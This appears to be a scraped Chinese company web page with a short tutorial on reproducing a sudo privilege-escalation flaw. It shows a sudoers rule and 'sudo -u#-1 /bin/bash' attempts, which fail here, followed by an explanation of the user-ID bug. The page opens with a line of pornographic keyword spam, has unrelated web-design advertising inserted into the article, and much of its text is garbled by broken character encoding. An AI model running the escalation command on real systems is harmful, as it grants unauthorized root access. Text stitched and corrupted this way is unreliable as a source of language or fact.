最近2018中文字幕在日韩欧美国产成人片_国产日韩精品一区二区在线_在线观看成年美女黄网色视频_国产精品一区三区五区_国产精彩刺激乱对白_看黄色黄大色黄片免费_人人超碰自拍cao_国产高清av在线_亚洲精品电影av_日韩美女尤物视频网站

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
sudo漏洞實例分析

本篇內(nèi)容介紹了“sudo漏洞實例分析”的有關(guān)知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領(lǐng)大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠?qū)W有所成!

為峽江等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計制作服務,及峽江網(wǎng)站建設(shè)行業(yè)解決方案。主營業(yè)務為網(wǎng)站設(shè)計、做網(wǎng)站、峽江網(wǎng)站設(shè)計,以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務,秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務。我們深信只要達到每一位用戶的要求,就會得到認可,從而選擇與我們長期合作。這樣,我們也可以走得更遠!

sudo介紹

大部分開發(fā)運維對這個命令都非常熟悉,不過考慮到有效讀者不了解我還是簡單介紹下。

sudo 指“超級用戶”。作為一個系統(tǒng)命令,其允許其它非 root 用戶以特殊權(quán)限來運行程序或命令,而無需切換使用環(huán)境。舉個例子:

我下面已一個普通用戶在 /usr/local/ 目錄下新建一個目錄,直接運行會報沒有權(quán)限的錯誤,

user1@user1:/usr/local$ mkdir test
mkdir: cannot create directory ‘test’: Permission denied
 

必須要這樣才可以,

user1@user1:/usr/local$ sudo mkdir test
user1@user1:/usr/local$ ls
bin  etc  games  include  lib  man  sbin  share  src  test
 

一個普通用戶要想使用sudo,必須有管理員(root)配置 sudoers 文件,對用戶的權(quán)限進行定義。類似下面這樣:

# User privilege specification
user2    ALL=(ALL:ALL) ALL
 

上述命令中:

  • user2 表示用戶名

  • 第一個 ALL 指示允許從任何終端、機器訪問 sudo

  • 第二個 (ALL:ALL) 指示 sudo 命令被允許以任何用戶身份執(zhí)行,后面那個ALL是用戶所在的群組

  • 第三個 ALL 表示所有命令都可以作為 root 執(zhí)行

如果沒有加這個配置,執(zhí)行的時候會報如下的錯誤:

user2@pony:/home$ sudo mkdir test2
[sudo] password for user2: 
user2 is not in the sudoers file.  This incident will be reported.
   

如何利用漏洞

我使用的linux版本是 Ubuntu 18.04.3 LTS 。

首先我配置用戶 user2 的權(quán)限,

# User privilege specification
user2    ALL=(ALL,!root) /bin/bash
 

這個配置的意思是,user2用戶可以用任何用戶(除了root)執(zhí)行 /bin/bash 命令。

然后我試著執(zhí)行,

user2@pony:~$ sudo -u#-1 /bin/bash
sudo: unknown user: #-1
sudo: unable to initialize policy plugin
 

什么鬼,好像沒有啥問題啊,直接報錯了,并沒有切換到 root 用戶,再試著執(zhí)行,

user2@pony:~$ sudo -u#-1 id -u
sudo: unknown user: #-1
sudo: unable to initialize policy plugin

也沒有任何問題啊,那這個漏洞究竟該怎么復現(xiàn)呢??

按照上面文章的說法,之所以會產(chǎn)生這個漏洞,是因為將用戶 ID 轉(zhuǎn)換為用戶名的函數(shù)會將 -1(或無效等效的 4294967295)誤認為是 0,而這正好是 root 的用戶 ID 。

“sudo漏洞實例分析”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編將為大家輸出更多高質(zhì)量的實用文章!


網(wǎng)頁名稱:sudo漏洞實例分析
分享網(wǎng)址:http://fisionsoft.com.cn/article/ipcgoo.html